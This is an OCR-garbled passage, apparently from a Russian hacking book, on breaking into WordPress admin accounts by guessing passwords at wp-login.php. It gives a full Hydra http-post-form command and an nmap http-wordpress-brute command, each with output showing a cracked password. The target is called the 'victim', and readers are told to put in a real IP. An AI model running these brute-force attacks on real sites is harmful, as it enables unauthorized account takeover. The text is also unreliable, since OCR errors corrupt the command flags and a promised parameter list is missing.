Взлом WordPress

Word.Press - один из самых популярных блоговых движков, который ис­ пользует как раз два рассмотренных ранее сервиса - веб-сервер Apache (или ngi.nx, но Apache тоже довольно часто используют для WordPress) и СУБД MySQL или один из ее форков.

Попробуем взломать Word.Press через форму входа. Как правило, форма вхо­ да открывается по адресу https://<имя-caйтa>/wp-login.php. В качестве име­ ШI админа используется admin - да, мноmе админы Word.Press очень глупы

и используют стандарrную учетку. Так что одну неизвестную - имя пользо­ вателя - мы уже знаем.

Для подбора пароля WordPress удобно использовать уже знакомый нам инструмент - Hydra. Следующий пример рассчитан на то, что при неверной авторизации возвращается код 200, а при успеппюй - 302. На практике так оно и есть. Запустить Hydra можно так:

hydra -V -f -1 admin -Р /root/wordlist -t 4 http-post-fonn://111.11.11.11 -m "/wp-login.php:log=лusERл&pwd=ЛPASS Л&wp­ suЬmit=Log+In&redirect_to=http%3A%2F%2Flll.ll.ll.11%2Fwp­

admin%2F&testcookie=l:S =302"

Здесь мы используем IР-адрес жерrвы 111.11.11.11, в реальном мире нужно использовать реальный IP. Параметры команды следующие:

[ВО] [http-post-foпn] host: 111.11.11.11 lo gin: adlllin password: topsecret [STATUS] attack finished for 111.11.11.11 (valid pair found)

1 of 1 target successfully completed, 1 valid password found

Hydra (http://www.thc.org/thc_hydra ) finished at 2 022-02-24 06:30:00

Также подобрать пароль можно с помощью сканера nmap. Сканер nmap позволяет в том числе производить подбор паролей для веб-форм автори­ зации, если использовать скрипт http-wordpress-brute с соответствующими аргументами:

--script-args user userdb pass passdb thread firstonly=true

nmap 111.11.11.11 --script http-wordpress-brute --script-a rgs 'user= adrnin,passdЬ= /root/wordlist, http-wordpress-brute. threa d=З, brute.firstonly=true'

1Accounts

10xdea dЬЗЗf:god => Login correct

1Statistics

1 Perfomed 103 guesses in 17 seconds, avera ge tps: 6